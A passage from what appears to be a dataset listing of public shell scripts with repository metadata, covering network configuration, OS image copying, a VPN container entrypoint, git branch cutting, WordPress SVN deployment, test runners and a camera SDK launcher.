DEVICE=$DEVICE
BOOTPROTO=static
ONBOOT=yes
IPADDR=$IPADDR
NETMASK=$NETMASK
GATEWAY=$GATEWAY
EOF
# Change resolv.conf (search domain + nameserver).
cp -p /etc/resolv.conf /etc/.resolv.conf-orig
cat > /etc/resolv.conf <<- EOF
search $SEARCH
nameserver $NAMESERVER
EOF
# Create sed commands that replace the placeholder NTP server lines.
cat > /root/ntpsed <<- EOF
/server first.ntp.server/ c \\server $NTP1
/server second.ntp.server/ c \\server $NTP2
EOF
# Edit ntp.conf file using the generated /root/ntpsed script.
sed -f /root/ntpsed /etc/ntp.conf > /etc/ntp.conf.new
mv /etc/ntp.conf /etc/.ntp.conf-orig
mv /etc/ntp.conf.new /etc/ntp.conf
cat > /etc/ntp/step-tickers <<- EOF
$NTP1
$NTP2
EOF
# Change hostname
sed "/HOSTNAME/ c \\HOSTNAME=$HOSTNAME" /etc/sysconfig/network > /etc/sysconfig/network.new
mv /etc/sysconfig/network /etc/sysconfig/.network-orig
mv /etc/sysconfig/network.new /etc/sysconfig/network
# Change default run level from 1 back to 3 in /etc/inittab.
sed "/id:1:initdefault:/ s/1/3/" /etc/inittab > /etc/inittab.new
mv /etc/inittab /etc/.inittab-orig
mv /etc/inittab.new /etc/inittab
echo "Change root password and reboot the system. "
| true |
d203ff56abae919ab1c40f703082a38619c06baf | Shell | Fullaxx/RapidBuilds | /RapidBuild64/001-core/RLBFILES/rootcopy/usr/bin/rli_02_copy.sh | UTF-8 | 1,017 | 3.8125 | 4 | [
"MIT"
] | permissive | #!/bin/bash
# Copy a built RapidLinux OS tree onto a target partition and install
# the GRUB boot files.  Aborts on any command failure (set -e).
set -e
usage()
{
	echo "Usage: $0 <disk> <partnum> <srcdir> <dst mount point>"
	exit 1
}
if [ "$#" != "4" ]; then
	usage
fi
# e.g. DISK=/dev/sda RLPARTNUM=1 -> RLPART=/dev/sda1
DISK="$1"
RLPARTNUM="$2"
RLPART="${DISK}${RLPARTNUM}"
SRCDIR="$3"
MNTDIR="$4"
# 64-bit hosts keep the GRUB modules under /usr/lib64.
if [ `uname -m` == "x86_64" ]; then
	LIBDIR="lib64"
else
	LIBDIR="lib"
fi
if [ ! -d ${MNTDIR} ]; then mkdir ${MNTDIR}; fi
mount ${RLPART} ${MNTDIR} -o noatime
echo "Copying OS from ${SRCDIR} to ${RLPART} (mounted on ${MNTDIR})..."
cp -av ${SRCDIR}/rl ${MNTDIR}
# Kernel, initramfs and memtest images plus the GRUB config/modules.
mkdir -p ${MNTDIR}/boot/grub
cp -av ${SRCDIR}/boot/{vmlinuz,irfs.img,mt86p} ${MNTDIR}/boot/
cp -av ${SRCDIR}/install/grub.cfg ${MNTDIR}/boot/grub/
cp -a /usr/${LIBDIR}/grub/i386-pc ${MNTDIR}/boot/grub/
if [ -d ${MNTDIR}/boot/grub/locale ]; then
	rm -rf ${MNTDIR}/boot/grub/locale
fi
# for NVMe devices: /dev/nvme0n1p2-style names carry the partition
# number after a 'p', so strip everything up to and including it.
if echo "${RLPARTNUM}" | grep -q 'p' ; then
	RLPARTNUM=`echo "${RLPARTNUM}" | cut -dp -f2`
fi
# Patch the placeholder partition index (hd0,x) in grub.cfg.
sed -e "s/hd0,x/hd0,${RLPARTNUM}/g" -i ${MNTDIR}/boot/grub/grub.cfg
# export NOW=`date "+%Y%m%d%H%M%S"`
# echo -n $NOW | sha1sum
| true |
cd328c4271520f4810612bdcacd8104f87670dc8 | Shell | hemmecke/aldor | /aldor/lib/axllib/test/ar6.sh | UTF-8 | 1,136 | 3.8125 | 4 | [
"Apache-2.0"
] | permissive | #!/bin/sh
#
# This script tests importing directly from an archive.
# If ${TMPDIR} is not defined, just use /tmp.
TMPDIR=${TMPDIR-/tmp}
# On MSVC platforms the compiler is invoked via its shell wrapper.
if [ "`platform|sed -e "s/.*msvc.*/y/g"`" = "y" ]; then
	ALDOR=aldor.sh
else
	ALDOR=aldor
fi
# Start from a clean library directory.
rm -rf $TMPDIR/lib
mkdir $TMPDIR/lib
echo '== Compiling numeral*.as into numeral*.ao'
$ALDOR -R $TMPDIR -Y $TMPDIR -F ao numeral*.as | grep -v "GC:"
echo '== Building an archive containing numeral*.ao'
ar cr $TMPDIR/lib/libnum.al $TMPDIR/numeral*.ao
rm -f $TMPDIR/numeral*.ao
echo '== Creating a client for the archive'
# The heredoc below is Aldor source code, not shell — keep it verbatim.
cat << END_numeral.as > $TMPDIR/numeral.as
-- A minimal program importing directly from an archive of compiler libraries.
-- Note that this one also uses a keyed reference to a compiler library.
#include "axllib.as"
#library Numeral "num"
import from Numeral;
-- Zero and One are exported from numeral*.as.
export Num: with {
	0: %;
	1: %;
}
== add {
	0: % == Zero pretend %;
	1: % == One pretend %;
}
END_numeral.as
echo '== Testing that the client imports from the archive'
$ALDOR -WTt+tinfer -Y $TMPDIR/lib $TMPDIR/numeral.as
echo '== Done'
| true |
08574fe7259dd95794c713a86f58cbc2cce1f233 | Shell | xmanningcentiq/blindeye | /.scripts/run.sh | UTF-8 | 646 | 3.25 | 3 | [] | no_license | #!/usr/bin/env bash
# Container entrypoint: verify VPN credentials are present, NAT the
# container's eth networks, start helper daemons once the VPN client is
# up, then run the expect script that drives the VPN session.
set -o pipefail
# Fail fast if any required credential/endpoint variable is missing.
for v in 'VPN_USER' 'VPN_PASS' 'VPN_DOMAIN' 'VPN_SERVER' ; do
    VARTEST="${v}"
    # NOTE(review): ${!VARTEST:-} is unquoted, so when the variable is
    # empty `[ -z ]` becomes a one-argument test that happens to be
    # true — it works, but quoting would make the intent explicit.
    if [ -z ${!VARTEST:-} ] ; then
        echo "Missing env variable ${v}"
        exit 1
    fi
done
# Masquerade traffic from every ethN subnet (CIDR taken from `ip a`).
for iface in $(ip a | grep eth | grep inet | awk '{ print $2 }') ; do
    iptables -t nat -A POSTROUTING -s "$iface" -j MASQUERADE
done
# Wait until the VPN monitor process exists, then bring up DNS
# (dnsmasq), proxy (squid), SSH (dropbear) and the keepalive loop.
delayed_start() {
    while [ "$(pgrep -f nxMonitor)" == "" ] ; do
        sleep 1
    done
    dnsmasq
    squid
    dropbear -s -m -R
    /root/keepalive.sh
}
delayed_start &
echo "------------ VPN Starts ------------"
/root/launch.expect
echo "------------ VPN exited ------------"
| true |
95dce64ff5b5b20b525e64575f66d0e8a83a34e1 | Shell | jupierce/aos-cd-jobs | /jobs/build/stagecut/scripts/stagecut.sh | UTF-8 | 1,261 | 4.03125 | 4 | [] | no_license | #!/usr/bin/env bash
# For each listed git repository: back up the current `stage` branch as
# stage-<last_sprint_number>, then reset `stage` to `master`.  All
# pushes of `stage` itself are currently disabled (dry-run mode).
set -o xtrace
set -e
if [ "$1" == "" ]; then
    echo "Syntax: $0 <last_sprint_number>"
    echo "Example: $0 130"
    exit 1
fi
LAST_SPRINT_NUMBER="$1"
shift 1
# The remaining arguments are repository URLs.
if [ "$1" == "" ]; then
    echo "At least one repository must be specified"
    exit 1
fi
for repo in $@; do
    echo "Processing git repository: ${repo}"
    # Work in a throwaway clone, removed at the end of each iteration.
    d=$(mktemp -d)
    git clone "${repo}" "${d}"
    pushd "${d}"
    git fetch --all
    if git checkout stage; then
        BACKUP_BRANCH="stage-${LAST_SPRINT_NUMBER}"
        # Refuse to clobber an existing backup branch.
        if git checkout "$BACKUP_BRANCH"; then
            echo "Backup branch $BACKUP_BRANCH already exists in $repo ; unable to proceed"
            exit 1
        fi
        git checkout -b "stage-${LAST_SPRINT_NUMBER}"
        git push origin "stage-${LAST_SPRINT_NUMBER}"
        # Reset stage to master locally; the force-push stays disabled.
        git checkout stage
        git reset --hard master
        #git push origin stage --force
        echo "TEST RUN - PUSHING IS NOT CURRENTLY ENABLED."
    else
        echo "Stage branch did not yet exist; creating it..."
        git checkout -b stage
        #git push origin stage
        echo "TEST RUN - PUSHING IS NOT CURRENTLY ENABLED."
    fi
    popd
    rm -rf "${d}"
done
| true |
a5246b2ebf82c09df23473ba8de7c65378d47ba7 | Shell | iwillhappy1314/deploy2wporg | /deploy.sh | UTF-8 | 4,520 | 3.765625 | 4 | [] | no_license | #!/usr/bin/env bash
set -e
#####################################################
# Deployment checks
#####################################################
# Do not deploy pull requests.
if [ "false" != "$TRAVIS_PULL_REQUEST" ]; then
    echo "Not deploying pull requests."
    exit
fi
# Deploy only once — only from the job that sets WP_PULUGIN_DEPLOY.
if [ ! "$WP_PULUGIN_DEPLOY" ]; then
    echo "Not deploying."
    exit
fi
# Remind and stop when the SVN repository is not configured.
if [ ! "$SVN_REPO" ]; then
    echo "SVN repo is not specified."
    exit
fi
#####################################################
# Fetch the code and start the build
#####################################################
# Create the working directory used for deployment.
mkdir build
cd build
BUILT_DIR=$(pwd)
# Check out the SVN repository.
echo "从 svn 仓库检出 $SVN_REPO ..."
svn co -q "$SVN_REPO" ./svn
# Clone the Git repository.  (Original author's note: it may already be
# present, so this could be redundant — maybe a plain checkout would do?)
echo "从 git 仓库克隆 $GIT_REPO ..."
git clone -q "$GIT_REPO" ./git
# If a build script is provided, run it.
cd "$BUILT_DIR"/git
if [ -e "bin/build.sh" ]; then
    echo "开始执行 bin/build.sh."
    bash bin/build.sh
fi
#####################################################
# Read the plugin versions from Git
#####################################################
READMEVERSION=$(grep "Stable tag" "$BUILT_DIR"/git/readme.txt | awk '{ print $NF}')
PLUGINVERSION=$(grep "Version:" "$BUILT_DIR"/git/"$MAINFILE" | awk '{ print $NF}')
# shellcheck disable=SC2046
LATEST_TAG=$(git describe --tags $(git rev-list --tags --max-count=1))
#####################################################
# Synchronize files
#####################################################
# Sync the Git repository into SVN.
cd "$BUILT_DIR"
echo "同步 Git 仓库到 SVN"
echo "$LATEST_TAG"
if [ "$TRAVIS_TAG" ]; then
    # Tagged release: sync everything, then remove the .git metadata.
    echo "同步 git 文件到 svg trunk 中"
    rsync -a --exclude=".svn" --checksum --delete ./git/ ./svn/trunk/
else
    # Non-tag build: only sync readme.txt and the assets.
    # readme.txt is updated only when the latest Git tag matches the tag
    # inside readme.txt, so as not to trigger an automatic release on
    # wordpress.org.
    if [ "$LATEST_TAG" = "$READMEVERSION" ]; then
        echo "同步 readme.text 和 assets"
        cp ./git/readme.txt ./svn/trunk/ -f
        cp ./git/wordpress.org/. ./svn/assets/ -fa
    else
        echo "git 版本和插件版本不一致,跳过更新"
    fi
fi
# After syncing, remove .git and wordpress.org from the SVN trunk.
echo "移除 svn trunk 中的 .git 和 wordpress.org 目录"
rm "$BUILT_DIR"/svn/trunk/.git -Rf
rm "$BUILT_DIR"/svn/trunk/wordpress.org -Rf
#####################################################
# Apply svn:ignore and delete the ignored files
#####################################################
cd "$BUILT_DIR"/svn/trunk
# Register the ignore patterns with SVN.
if [ -e ".svnignore" ]; then
    echo "根据 .svnignore 忽略文件"
    svn propset -q -R svn:ignore -F .svnignore .
fi
# Physically delete the ignored files.
echo "删除忽略文件"
# shellcheck disable=SC2013
for file in $(cat ".svnignore" 2>/dev/null); do
    rm "$file" -Rf
done
#####################################################
# Perform the SVN operations
#####################################################
cd "$BUILT_DIR"/svn
# NOTE(review): the two progress messages below are swapped relative to
# the commands they label ('^!' entries are svn-deleted, '^?' entries
# are svn-added); the commands themselves look correct.
echo "运行 svn add"
svn st | grep '^!' | sed -e 's/\![ ]*/svn del -q /g' | sh
echo "运行 svn del"
svn st | grep '^?' | sed -e 's/\?[ ]*/svn add -q /g' | sh
#####################################################
# Commit with the configured credentials; a tag is required to release
#####################################################
cd "$BUILT_DIR"/svn
svn stat
if [ "$TRAVIS_TAG" ] && [ "$LATEST_TAG" = "$READMEVERSION" ]; then
    #####################################################
    # Compare versions; bail out when they differ
    #####################################################
    if [ "$READMEVERSION" != "$PLUGINVERSION" ]; then
        echo "插件主文件和 readme.txt 中的版本不一致,退出..."
        exit 1
    fi
    # Publish the new version to wordpress.org.
    echo "发布到 wordpress.org"
    svn ci --no-auth-cache --username "$SVN_USER" --password "$SVN_PASS" -m "Deploy version $READMEVERSION"
    # Create the release tag.
    echo "打标签"
    svn copy --no-auth-cache --username "$SVN_USER" --password "$SVN_PASS" "$SVN_REPO"/trunk "$SVN_REPO"/tags/"$READMEVERSION" -m "Add tag $READMEVERSION"
    echo "发布新版本完成"
else
    svn ci --no-auth-cache --username "$SVN_USER" --password "$SVN_PASS" -m "Update readme.txt"
    echo "更新 assets 和 readme.txt 完成"
fi
| true |
4affc08fb1a3c6a7278df794f90f4886e0b6b16d | Shell | zysunGithub/BashDaily | /show123.sh | UTF-8 | 499 | 3.578125 | 4 | [] | no_license | #!/bin/bash
# Program:
#	This program only accepts the following choices: one|two|three
# History:
# 20200116 zysun first release
# Use a fixed, predictable PATH for the commands below.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin:
export PATH
read -p "Please input your choice:" choice
# The case selector word is not field-split, so a multi-word answer such
# as "one two" matches its own pattern below.
case ${choice} in
"one" )
	echo "Your choice is ONE."
	;;
"two" )
	echo "Your choice is TWO."
	;;
"three")
	echo "Your choice is THREE."
	;;
"one two")
	echo "Your choice is ONE TWO."
	;;
* )
	echo "Usage ${0} one|two|three."
	;;
esac
| true |
bed857c333229a0764e6d80ea2020d9669c2017e | Shell | tidepool-org/tide-whisperer | /test.sh | UTF-8 | 131 | 2.5625 | 3 | [] | no_license | #!/bin/sh -eu
# Run `go test -v` in every top-level directory containing a _test.go
# file (vendor/ excluded).  The subshell keeps the cwd stable between
# iterations, and with `sh -eu` (see shebang) a failing suite — the
# subshell exiting non-zero — aborts the whole script.
# NOTE(review): `uniq` only collapses adjacent duplicates; this relies
# on find emitting a directory's test files consecutively.
for D in $(find . -name '*_test.go' ! -path './vendor/*' | cut -f2 -d'/' | uniq); do
	(cd ${D}; go test -v)
done
| true |
de6d6f465b76a83bd4de31d10d5fd26782fd1d83 | Shell | gurbain/HaloLinux_Software | /Utilities/drivers/pleora/bin/GEVPlayer | UTF-8 | 1,074 | 3.140625 | 3 | [] | no_license | #!/bin/bash
# Get the executable's absolute path (one level above this script).
DIRNAME=`dirname $0`
DIRNAME=`cd $DIRNAME/..; pwd`
# Set the environment expected by the Pleora / GenICam runtime.
export PUREGEV_ROOT=$DIRNAME
export GENICAM_ROOT=$DIRNAME/lib/genicam
export GENICAM_ROOT_V2_3=$GENICAM_ROOT
export GENICAM_LOG_CONFIG=$DIRNAME/lib/genicam/log/config/DefaultLogging.properties
export GENICAM_LOG_CONFIG_V2_3=$GENICAM_LOG_CONFIG
export GENICAM_CACHE_V2_3=$HOME/.config/Pleora/genicam_cache_v2_3
export GENICAM_CACHE=$GENICAM_CACHE_V2_3
mkdir -p $GENICAM_CACHE
# Prepend the SDK lib dir to LD_LIBRARY_PATH if it is not already there.
if ! echo ${LD_LIBRARY_PATH} | /bin/grep -q $PUREGEV_ROOT/lib; then
    if [ "$LD_LIBRARY_PATH" = "" ]; then
        LD_LIBRARY_PATH=$PUREGEV_ROOT/lib
    else
        LD_LIBRARY_PATH=$PUREGEV_ROOT/lib:${LD_LIBRARY_PATH}
    fi
fi
# Pick the GenICam binary directory matching the host architecture.
if [ `uname -m` == "x86_64" ]; then
    GENICAM_LIB_DIR=bin/Linux64_x64
else
    GENICAM_LIB_DIR=bin/Linux32_i86
fi
if ! echo ${LD_LIBRARY_PATH} | /bin/grep -q $GENICAM_ROOT/$GENICAM_LIB_DIR; then
    LD_LIBRARY_PATH=$GENICAM_ROOT/$GENICAM_LIB_DIR:${LD_LIBRARY_PATH}
fi
export LD_LIBRARY_PATH
# Launch the real binary with the environment prepared above.
$PUREGEV_ROOT/bin/GEVPlayer.bin
| true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.